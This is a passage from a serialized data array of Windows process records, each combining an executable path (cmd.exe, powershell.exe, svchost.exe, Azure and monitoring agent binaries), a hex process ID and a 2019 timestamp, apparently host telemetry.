00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8dc2019-02-09 21:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-09 23:22:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6f82019-02-09 23:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fc02019-02-10 00:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10bc2019-02-10 00:12:56.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb482019-02-10 00:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xbd02019-02-09 21:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xe342019-02-09 22:02:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x53c2019-02-09 22:32:56.247000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xef42019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xcd82019-02-09 20:52:56.260000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x181c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbc2019-02-09 21:09:24.310000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-09 23:20:15.547000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0xda82019-02-09 23:55:46.057000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x7982019-02-10 00:26:22.213000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe2c2019-02-10 01:31:14.010000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x18982019-02-10 02:35:21.217000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17c42019-02-10 03:39:26.323000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-10 04:43:32.697000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a82019-02-10 05:47:40.657000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x82c2019-02-10 05:55:52.110000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c102019-02-10 06:51:50.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 07:56:00.233000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb102019-02-10 09:00:10.517000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x8c02019-02-09 22:16:24.523000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xc982019-02-10 10:04:18.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 11:04:35.127000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16bc2019-02-10 11:08:29.550000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x1be42019-02-10 